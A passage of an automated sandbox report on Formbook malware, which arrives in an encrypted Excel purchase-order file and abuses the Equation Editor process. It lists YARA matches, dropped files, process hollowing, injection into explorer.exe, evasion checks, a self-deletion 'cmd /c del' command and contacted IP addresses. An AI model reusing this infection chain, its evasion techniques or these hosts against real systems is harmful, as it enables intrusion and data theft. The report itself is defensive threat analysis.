Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@12/12@12/8
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C3A6AD GetLastError,FormatMessageW, 5_2_00C3A6AD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403461
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 4_2_0040473E
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C34148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 5_2_00C34148
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar, 4_2_0040216B
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C3443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 5_2_00C3443D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Purchase Order.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD39.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Purchase Order.xlsx ReversingLabs: Detection: 23%
Source: acqyswhf.exe String found in binary or memory: The device has succeeded a query-stop and its resource requirements have changed.
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
Source: unknown Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: unknown Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Process created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe'
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: Purchase Order.xlsx Static file information: File size 2507264 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: acqyswhf.exe, dtz25z5e9sr.exe, svchost.exe
Source: Binary string: svchost.pdb source: dtz25z5e9sr.exe, 00000006.00000002.2204947224.00000000002C4000.00000004.00000020.sdmp
Source: Purchase Order.xlsx Initial sample: OLE indicators vbamacros = False
Source: Purchase Order.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Unpacked PE file: 6.2.dtz25z5e9sr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE4B77 LoadLibraryA,GetProcAddress, 5_2_00BE4B77
PE file contains an invalid checksum
Source: vbc.exe.2.dr Static PE information: real checksum: 0x0 should be: 0xcb8fe
Source: scancopy87867678[1].exe.2.dr Static PE information: real checksum: 0x0 should be: 0xcb8fe
Source: dtz25z5e9sr.exe.5.dr Static PE information: real checksum: 0xdf890 should be: 0xe835e
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00418855 push cs; iretd 6_2_0041885C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004070C8 push ecx; retf 6_2_004070CE
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0040BACC push esp; retf 6_2_0040BACD
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004092E8 push cs; iretd 6_2_004092ED
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004162B3 push esp; retf 6_2_004162CF
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041B3C5 push eax; ret 6_2_0041B418
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041B47C push eax; ret 6_2_0041B482
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041B412 push eax; ret 6_2_0041B418
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041B41B push eax; ret 6_2_0041B482
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041CF7F push es; iretd 6_2_0041CF80
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041CFC2 push dword ptr [ebp-4DC2E796h]; iretd 6_2_0041CFD0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BEDFA1 push ecx; ret 6_2_00BEDFB4
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004070C8 push ecx; retf 6_1_004070CE
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004092E8 push cs; iretd 6_1_004092ED
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004162B3 push esp; retf 6_1_004162CF
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041B3C5 push eax; ret 6_1_0041B418
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041B47C push eax; ret 6_1_0041B482
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041B412 push eax; ret 6_1_0041B418
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041B41B push eax; ret 6_1_0041B482
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00418855 push cs; iretd 6_1_0041885C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0040BACC push esp; retf 6_1_0040BACD
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041CF7F push es; iretd 6_1_0041CF80
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041CFC2 push dword ptr [ebp-4DC2E796h]; iretd 6_1_0041CFD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0085DFA1 push ecx; ret 10_2_0085DFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009C04B push ss; iretd 10_2_0009C04E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000870C8 push ecx; retf 10_2_000870CE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000962B3 push esp; retf 10_2_000962CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000892E8 push cs; iretd 10_2_000892ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009B3C5 push eax; ret 10_2_0009B418
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009B41B push eax; ret 10_2_0009B482
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009B412 push eax; ret 10_2_0009B418

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe File created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_00BE5EDA
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BF33B7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 5_2_00BF33B7
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: Purchase Order.xlsx Stream path 'EncryptedPackage' entropy: 7.99991439785 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C60501 rdtsc 5_3_03C60501
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2332 Thread sleep time: -360000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2992 Thread sleep time: -45000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 752 Thread sleep time: -38000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Code function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_004059F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040659C FindFirstFileA,FindClose, 4_2_0040659C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004027A1 FindFirstFileA, 4_2_004027A1
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_00C34005
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 5_2_00C3C2FF
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 5_2_00BE5D13
Source: explorer.exe, 00000008.00000000.2183457068.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000002.2380246315.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2183832262.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000008.00000000.2183457068.0000000004234000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2180947602.00000000002CD000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000008.00000002.2380274891.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C60501 rdtsc 5_3_03C60501
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00409B30 LdrLoadDll, 6_2_00409B30
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C445D5 BlockInput, 5_2_00C445D5
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 5_2_00BE5240
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE4B77 LoadLibraryA,GetProcAddress, 5_2_00BE4B77
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C22AF8 mov eax, dword ptr fs:[00000030h] 5_3_03C22AF8
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BF26F8 mov eax, dword ptr fs:[00000030h] 6_2_00BF26F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008626F8 mov eax, dword ptr fs:[00000030h] 10_2_008626F8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 5_2_00C288CD
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00BFA385
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BFA354 SetUnhandledExceptionFilter, 5_2_00BFA354

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 103.209.233.78 80
Source: C:\Windows\explorer.exe Network Connect: 104.21.47.75 80
Source: C:\Windows\explorer.exe Network Connect: 23.228.109.141 80
Source: C:\Windows\explorer.exe Network Connect: 81.17.18.195 80
Source: C:\Windows\explorer.exe Network Connect: 50.87.169.249 80
Source: C:\Windows\explorer.exe Network Connect: 208.92.209.208 80
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Section unmapped: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: B60000
Writes to foreign memory regions
